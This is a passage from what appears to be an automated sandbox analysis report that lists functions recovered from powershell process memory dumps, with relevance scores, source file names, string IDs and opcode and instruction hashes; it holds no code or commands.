                                                                            • Instruction Fuzzy Hash: 3A0227B1B003269FC7199B68890176ABBE2AFE1215F14C4AACD15CB252DF35C8C7D793
                                                                            Function 07821020 Relevance: 5.4, Strings: 4, Instructions: 426COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$4'^q$$^q$$^q
                                                                            • API String ID: 0-2049395529
                                                                            • Opcode ID: b08643bd6486e4554595784fdbe266b25741b4a3a8f421bf3214b42b82a10f4b
                                                                            • Instruction ID: b1c621e0ed0e8940434e6aa339e42c057e4d9639c81b69e04866e5735f361125
                                                                            • Opcode Fuzzy Hash: b08643bd6486e4554595784fdbe266b25741b4a3a8f421bf3214b42b82a10f4b
                                                                            • Instruction Fuzzy Hash: 95026EB4F002199FD714CF98C548E9ABBF2BB99315F24C065E9099B355CB32EC86CB91
                                                                            Function 07822741 Relevance: 5.1, Strings: 4, Instructions: 118COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                            • API String ID: 0-2125118731
                                                                            • Opcode ID: 08a888dfb5cc92f76da9173a6cbfbe28df3676780d6ae6e78545da9bc7170bff
                                                                            • Instruction ID: 2d7080861a0e795d129bba674c1cb5928ef8751d26d573c469d3792c524561e0
                                                                            • Opcode Fuzzy Hash: 08a888dfb5cc92f76da9173a6cbfbe28df3676780d6ae6e78545da9bc7170bff
                                                                            • Instruction Fuzzy Hash: 884106F0A2422AEFDB249E24C540B7937E1BF60356F568065E814CB2A1DF34D9C6EB51
                                                                            Function 07827CB4 Relevance: 4.0, Strings: 3, Instructions: 276COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$4'^q$4'^q
                                                                            • API String ID: 0-1196845430
                                                                            • Opcode ID: aed4b3e22611bf46275335afefd312c1ad09af9a4d378d6e997e32584bc6a3cc
                                                                            • Instruction ID: 30221e0a99402a00e279fdae9a7f44d7928f0dfbbcc830f5b25d8ae3067edf6d
                                                                            • Opcode Fuzzy Hash: aed4b3e22611bf46275335afefd312c1ad09af9a4d378d6e997e32584bc6a3cc
                                                                            • Instruction Fuzzy Hash: 8EB1CFB4A00219DFCB14CF69C540B9EBBB2AF98305F14C419DA05AF395CB35EC86CBA1
                                                                            Function 078204E0 Relevance: 3.9, Strings: 3, Instructions: 124COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $^q$$^q$$^q
                                                                            • API String ID: 0-831282457
                                                                            • Opcode ID: b427b81c53399fd7be6f6ea43d210b8ae4df954f31588482f6946b4a288a7bf9
                                                                            • Instruction ID: f0d35d34073d29a20cf6725dc15a9acd4531a9eec5e24acb2d7fadd3bf4b72aa
                                                                            • Opcode Fuzzy Hash: b427b81c53399fd7be6f6ea43d210b8ae4df954f31588482f6946b4a288a7bf9
                                                                            • Instruction Fuzzy Hash: 4D417DB1F002299BCB249E69894066AF7E5BFE4211B14842AC809EB305DF31D986D7E1
                                                                            Function 07820BA8 Relevance: 3.8, Strings: 3, Instructions: 94COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $^q$$^q$$^q
                                                                            • API String ID: 0-831282457
                                                                            • Opcode ID: 24ff5fc7ec15596af445c3cd923ff7f99c5f8488b08882e034f095b3b5f75a2b
                                                                            • Instruction ID: 0a087fcadb9cfd7007a54be89fc0b0ae6b6b883527e3de8dcad89f78eb054d7f
                                                                            • Opcode Fuzzy Hash: 24ff5fc7ec15596af445c3cd923ff7f99c5f8488b08882e034f095b3b5f75a2b
                                                                            • Instruction Fuzzy Hash: 58214CF170432A6BD7345D699840B27B6DA5BE0726F24882AA905CF3A1CD35C4C6A361
                                                                            Function 07826EC3 Relevance: 2.9, Strings: 2, Instructions: 395COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$4'^q
                                                                            • API String ID: 0-2697143702
                                                                            • Opcode ID: 170a7518d8854484188ea4aacb44b9979782b0cf1e7bad72ea8bdf8cc6ea6b69
                                                                            • Instruction ID: 0ad51a2abc0e125ce1ab0f95a21a0d39b13ab8d82f7aaf187311059a33454eb4
                                                                            • Opcode Fuzzy Hash: 170a7518d8854484188ea4aacb44b9979782b0cf1e7bad72ea8bdf8cc6ea6b69
                                                                            • Instruction Fuzzy Hash: BAF1C3B0B402189FD724DB68CD51F5ABBB2AF94304F1084A5EA09AF395CB75DCC68F91
                                                                            Function 09280D7E Relevance: 2.9, Strings: 2, Instructions: 378COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009982520.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_9280000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$4'^q
                                                                            • API String ID: 0-2697143702
                                                                            • Opcode ID: 9116e9c9fc5f6d185b0cafdb9a2c68e255188888e1bc4694454b3ddd278d4fac
                                                                            • Instruction ID: ba8617f90163290b06d1931c75e84bcb3f755e9086a7d403b8c08fdd02786f6b
                                                                            • Opcode Fuzzy Hash: 9116e9c9fc5f6d185b0cafdb9a2c68e255188888e1bc4694454b3ddd278d4fac
                                                                            • Instruction Fuzzy Hash: 94F1A4B4A402189FD714DB68CD54BAABBB2AB84304F1084A9D909AF395CF71DD86CF91
                                                                            Function 04B5F628 Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2956215880.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_4b50000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: \VHm$\VHm
                                                                            • API String ID: 0-4104177699
                                                                            • Opcode ID: 5706e7b62dca012a723f894767fa975f6b13c50529c1048dc2358d60dc738f9b
                                                                            • Instruction ID: 8c4e8ff71f0442daf9c7b767e325d3dcaf81cb60234dc334a572c2f2aea55afa
                                                                            • Opcode Fuzzy Hash: 5706e7b62dca012a723f894767fa975f6b13c50529c1048dc2358d60dc738f9b
                                                                            • Instruction Fuzzy Hash: FC714D71E00209DFDB10DFA9D8847AEFBF1EF88314F148169E815A7264EB74A846CF91
                                                                            Function 04B5F630 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2956215880.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_4b50000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: \VHm$\VHm
                                                                            • API String ID: 0-4104177699
                                                                            • Opcode ID: a852f0a830b5e231abec05e84311acb0e95793448f55d6adb1747cc67987ee47
                                                                            • Instruction ID: f4bcffa668717c9c7a3831f025d2cf0ea8b9273744210cbd77c6bbf775be2729
                                                                            • Opcode Fuzzy Hash: a852f0a830b5e231abec05e84311acb0e95793448f55d6adb1747cc67987ee47
                                                                            • Instruction Fuzzy Hash: 36714E71E00209DFDB14DFA9C8447AEFBF2EF88314F148569D815A7264EB74A846CF91
                                                                            Function 04B5C1A8 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2956215880.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_4b50000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: h]Hm$IHm
                                                                            • API String ID: 0-911805665
                                                                            • Opcode ID: 486d8200a183d1544a46e6cb3e0119e07b1f879f73434d2467ece2d7b4fca589
                                                                            • Instruction ID: b4eec73c655679e7545b06e44720c57d19a6a4c59caa6cb7b51d44908aa85fe1
                                                                            • Opcode Fuzzy Hash: 486d8200a183d1544a46e6cb3e0119e07b1f879f73434d2467ece2d7b4fca589
                                                                            • Instruction Fuzzy Hash: B7315230B052188FDB25DB64C8547EEBBB2AF89345F1044E9D90AAB361CB35DE81CF81
                                                                            Function 07820B8C Relevance: 2.6, Strings: 2, Instructions: 83COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $^q$$^q
                                                                            • API String ID: 0-355816377
                                                                            • Opcode ID: ebbeb1949fabb29fc808ccffb6b9b3acb877509d4ff2eeea3f970c79a7d2d728
                                                                            • Instruction ID: 41230d4618171e91b0b6d5220eb653483d69f51559daedb98976459547ad7a08
                                                                            • Opcode Fuzzy Hash: ebbeb1949fabb29fc808ccffb6b9b3acb877509d4ff2eeea3f970c79a7d2d728
                                                                            • Instruction Fuzzy Hash: D5218BF130836A6BDB310E3948447232BE65FE1726F244426A944CF2A2C92985C6D362
                                                                            Function 078206CF Relevance: 2.6, Strings: 2, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: tP^q$tP^q
                                                                            • API String ID: 0-309238000
                                                                            • Opcode ID: b6eae2e8c56be0264f3a902e883c180cc216c02dee307aea662cbb90cfece1f8
                                                                            • Instruction ID: 89b2b4e34eb206c115434e9b2803fb9405061d80f9305f5ffab5bdd5470d1777
                                                                            • Opcode Fuzzy Hash: b6eae2e8c56be0264f3a902e883c180cc216c02dee307aea662cbb90cfece1f8
                                                                            • Instruction Fuzzy Hash: 790166B2F053159FDB159A288825AA6FBB1AF90720F14805AE5449F380DB228947CB8A
                                                                            Function 04B5EFDD Relevance: 1.5, Strings: 1, Instructions: 277COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2956215880.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_4b50000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: \VHm
                                                                            • API String ID: 0-3272467948
                                                                            • Opcode ID: 37cb365c96ff1a52eec7b3f72dd4e087587589c76c9fc24a85009479c19fe597
                                                                            • Instruction ID: 4f8dc79a6033f5a26747a2e48763c5141b50f2fb6187913a47f88f40b935d7aa
                                                                            • Opcode Fuzzy Hash: 37cb365c96ff1a52eec7b3f72dd4e087587589c76c9fc24a85009479c19fe597
                                                                            • Instruction Fuzzy Hash: 81B13D70E00209DFDF10DFA9D9857ADFBF2EF88314F148569E815A7264EB74A846CB81
                                                                            Function 091C4610 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009367324.00000000091C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_91c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: PH^q
                                                                            • API String ID: 0-2549759414
                                                                            • Opcode ID: 073993af683c8e80d539e13a1710a5dc8982a50b23155f9b561726d99910685e
                                                                            • Instruction ID: d6f64f5fe89542d07b84f5e4ec3e53f1c08d2f518d6392d9419adda469f6107a
                                                                            • Opcode Fuzzy Hash: 073993af683c8e80d539e13a1710a5dc8982a50b23155f9b561726d99910685e
                                                                            • Instruction Fuzzy Hash: D37138B0F042588FDB15CBF4C955BADBBB2AF95308F244429E402AF2A4DB74AD49CB41
                                                                            Function 091C45FF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009367324.00000000091C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_91c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: PH^q
                                                                            • API String ID: 0-2549759414
                                                                            • Opcode ID: 31e345b54513f342d5d5fa01799b536e8b984715407a25ee5ba1314ec1429157
                                                                            • Instruction ID: e87b364bf5a24d1edebe2b842783a716ca168644c3445d2f12b5189e79e3a3b9
                                                                            • Opcode Fuzzy Hash: 31e345b54513f342d5d5fa01799b536e8b984715407a25ee5ba1314ec1429157
                                                                            • Instruction Fuzzy Hash: 68517970E043589FCB15CFB4C9556ADBBB2BF96308F10852DE406AF2A4DB74AD45CB41
                                                                            Function 078237D9 Relevance: 1.3, Strings: 1, Instructions: 43COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: tP^q
                                                                            • API String ID: 0-2862610199
                                                                            • Opcode ID: 8454ddbd4f9752a2bdd4dfb99f296c0dfc9fec382d363751753c4b3d35af8930
                                                                            • Instruction ID: c7fed4cae5febee7328d63f12c7ca9a3ecf375df62be00dcfaa6810616e204f1
                                                                            • Opcode Fuzzy Hash: 8454ddbd4f9752a2bdd4dfb99f296c0dfc9fec382d363751753c4b3d35af8930
                                                                            • Instruction Fuzzy Hash: A5F049B5B400246BC314DA99D8149AAF7A5AB84725B18C85EE4088F241CE31CD43C790
                                                                            Function 07824248 Relevance: .7, Instructions: 715COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ba7ecaa1db82901bfec57b8267391ed2bb53b65c82b30d0bc79872ae2675a435
                                                                            • Instruction ID: d1711106ed44a9ab1aa998e9316f1c347747df63c98bb6409af0eca86e9406ed
                                                                            • Opcode Fuzzy Hash: ba7ecaa1db82901bfec57b8267391ed2bb53b65c82b30d0bc79872ae2675a435
                                                                            • Instruction Fuzzy Hash: 125278B4B00258DFD714CB98C544F9ABBE2AF94305F24C069D9199B365CB72EC87CBA1
                                                                            Function 07824228 Relevance: .7, Instructions: 651COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c1d57240b5b8e874e3e6fa785d1c2d6afc54e47ef99a7f44eb87940a786d0a83
                                                                            • Instruction ID: 1d922792d1992485139c087133728988ca1d7d1f7591a225551c0af5606396e3
                                                                            • Opcode Fuzzy Hash: c1d57240b5b8e874e3e6fa785d1c2d6afc54e47ef99a7f44eb87940a786d0a83
                                                                            • Instruction Fuzzy Hash: 455278B4A00254DFD714CF98C584E9ABBB2AF94305F24C059E9199B365CB72EC87CFA1
                                                                            Function 07824483 Relevance: .5, Instructions: 493COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a56a6516f6c167f82600ec3835eacdcfd15a9325e1100b8237f2ece65dd3e3c9
                                                                            • Instruction ID: dffb5b062beca561887ae1e67980b84625d37785b5e0c79e4df036cd034cc0b3
                                                                            • Opcode Fuzzy Hash: a56a6516f6c167f82600ec3835eacdcfd15a9325e1100b8237f2ece65dd3e3c9
                                                                            • Instruction Fuzzy Hash: 3E2268B4A00255DFD714CF88C584E9ABBB2BB94305F24C059E9199B365CB72EC87CFA1
                                                                            Function 078249BB Relevance: .4, Instructions: 439COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4fb467e70bc7530a4727637f88fe24c4e6652492a8cde6fadf590cf170c47798
                                                                            • Instruction ID: bb27851cd2fe5a11c81e877ced723e5bf00213143e8d6cb9c4bd9aa23109462f
                                                                            • Opcode Fuzzy Hash: 4fb467e70bc7530a4727637f88fe24c4e6652492a8cde6fadf590cf170c47798
                                                                            • Instruction Fuzzy Hash: C50259B4A00255DFD714CF98C580F9ABBB2AB94305F24C059E9199B365CB72EC87CFA1
                                                                            Function 0782479C Relevance: .4, Instructions: 419COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 41ee9052e6beb578e087054ea366298ba87ba2a2a61b7bae5944f34d32b952d7
                                                                            • Instruction ID: 870bf2b71bb1cf6e665622a76bb7ba8da3d1826d5de4aba7d5bfdd1899e81ae4
                                                                            • Opcode Fuzzy Hash: 41ee9052e6beb578e087054ea366298ba87ba2a2a61b7bae5944f34d32b952d7
                                                                            • Instruction Fuzzy Hash: 2D0259B4A00255DFD714CF88C580E9ABBB2BB94315F24C059E9199B365CB72EC87CFA1
                                                                            Function 078214DC Relevance: .4, Instructions: 404COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 936aa936c702c718700dfa0f251426d9db7e7a433e9e0a0027ce7617f6c6ac3e
                                                                            • Instruction ID: f07fff404fba18ea3f403f099566cd6ee54e6e0a93c7d6be61d7870dbe251e84
                                                                            • Opcode Fuzzy Hash: 936aa936c702c718700dfa0f251426d9db7e7a433e9e0a0027ce7617f6c6ac3e
                                                                            • Instruction Fuzzy Hash: 87F17DB4B00219EFDB14CF58C558FAABBB2BB94315F24C095E9059B351CB72EC86CB91
                                                                            Function 07821000 Relevance: .4, Instructions: 393COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: edd827c70635abd29ae374e3d24ea4788f9cd1f21c418ce477839a88ef360d37
                                                                            • Instruction ID: 4f484a97891b287850a12cda84570d2396e61b727ead99846f19b44de34babe0
                                                                            • Opcode Fuzzy Hash: edd827c70635abd29ae374e3d24ea4788f9cd1f21c418ce477839a88ef360d37
                                                                            • Instruction Fuzzy Hash: 78F15CB4F00219DFDB14CF98C548E9ABBB2BB95315F24C099E9099B355C732EC86CB91
                                                                            Function 078212AE Relevance: .3, Instructions: 346COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f98ddaa3ad12e39b4ead2d288a1b4e71216cf69e0b5da783b680343137c328d7
                                                                            • Instruction ID: 4975f18e3c602387d0939858523ac1036d35430a3cde2edab1a99f26487ca54f
                                                                            • Opcode Fuzzy Hash: f98ddaa3ad12e39b4ead2d288a1b4e71216cf69e0b5da783b680343137c328d7
                                                                            • Instruction Fuzzy Hash: 71E14DB4B00219EFD704CF98C558E9ABBB2FB98315F24C055E9099B355CB32EC86CB91
                                                                            Function 091C05A0 Relevance: .3, Instructions: 336COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009367324.00000000091C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_91c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b8c1f7bc833d75d4700d7bd527bd26903e041f8072b06f5324744a105993c977
                                                                            • Instruction ID: e65b9b819c5a690a6a7fb3e3ceae687d64c80c3f7217e56c799dac6ddb104aeb
                                                                            • Opcode Fuzzy Hash: b8c1f7bc833d75d4700d7bd527bd26903e041f8072b06f5324744a105993c977
                                                                            • Instruction Fuzzy Hash: B9E1F474E01219DFDB14CF98C584AAEBBB2FF88314F258559E849AB365C731ED81CB90
                                                                            Function 04B52B48 Relevance: .3, Instructions: 328COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2956215880.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_4b50000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 96ef1c9da632a8c0fc0ae65805c6e74ae4402182103aefd6b6474e4aa8772bca
                                                                            • Instruction ID: d6ce1fe3da99d8ab0dae77f8b4897483689bd2375b6e7ae5f48b773c76d8e7b9
                                                                            • Opcode Fuzzy Hash: 96ef1c9da632a8c0fc0ae65805c6e74ae4402182103aefd6b6474e4aa8772bca
                                                                            • Instruction Fuzzy Hash: 43D1E370A092848FDB0ACF68C494AAABFB1EF46310B1945D6D855DB2B6C335FC51CFA4
                                                                            Function 04B59388 Relevance: .3, Instructions: 317COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2956215880.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_4b50000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: adeaa255e7ddba552d9bfe5f5ecc6b42e43720ffe15648c3a3bf61b8e234b1e9
                                                                            • Instruction ID: e91ebb7b3c40c38c5471fc8150a5276350079c5c42d20239f1abfc974fa0a0e9
                                                                            • Opcode Fuzzy Hash: adeaa255e7ddba552d9bfe5f5ecc6b42e43720ffe15648c3a3bf61b8e234b1e9
                                                                            • Instruction Fuzzy Hash: 28C18C75A00208DFDB14DFA4D544A9EBBB6FF84314F1185A9E8069F265DB74EC89CF80
                                                                            Function 04B539B0 Relevance: .3, Instructions: 316COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2956215880.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_4b50000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: de5a12ed412e3ffabf3a1b8f026d55510e6480bf84fdec38922a24b093ad93fa
                                                                            • Instruction ID: db981d9fe0b92583a4af1aad364b24f9dd0dfa0cad7d2a8d933c91dbbf69aafc
                                                                            • Opcode Fuzzy Hash: de5a12ed412e3ffabf3a1b8f026d55510e6480bf84fdec38922a24b093ad93fa
                                                                            • Instruction Fuzzy Hash: 15D10634A00219AFDB05CF98D584A9DFBF2FF88350F258599E805AB365C775ED82CB90
                                                                            Function 04B531C8 Relevance: .3, Instructions: 309COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2956215880.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_4b50000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c0c55cc1804ee19f49660b772dbe4fe70ad51951b6c0ebffa79a72744c53993c
                                                                            • Instruction ID: 4a480fda0d63bb0ab38de37e1f25528ce6a0b7833392d7889f82b2227d336465
                                                                            • Opcode Fuzzy Hash: c0c55cc1804ee19f49660b772dbe4fe70ad51951b6c0ebffa79a72744c53993c
                                                                            • Instruction Fuzzy Hash: 45D13834A012489FDB05CFA8D584A9DFBF2EF88350F248599E844AB365C731ED85CB90
                                                                            Function 078260A8 Relevance: .3, Instructions: 275COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6713d4f850116681ddbfafcb1f9a940b9c2c9c122dc6c0e1a45e77e8dc201047
                                                                            • Instruction ID: fd950442d35f0ccddc1a73b14ef09cf48615d494419a86107b416193288c2a06
                                                                            • Opcode Fuzzy Hash: 6713d4f850116681ddbfafcb1f9a940b9c2c9c122dc6c0e1a45e77e8dc201047
                                                                            • Instruction Fuzzy Hash: 98B1C2B0B00214DFC704DF58C955B5EBBE2BB98305F208029E905EF795DB72EC868B91
                                                                            Function 04B5F8AE Relevance: .3, Instructions: 264COMMON
                                                                            Download Yara Rule
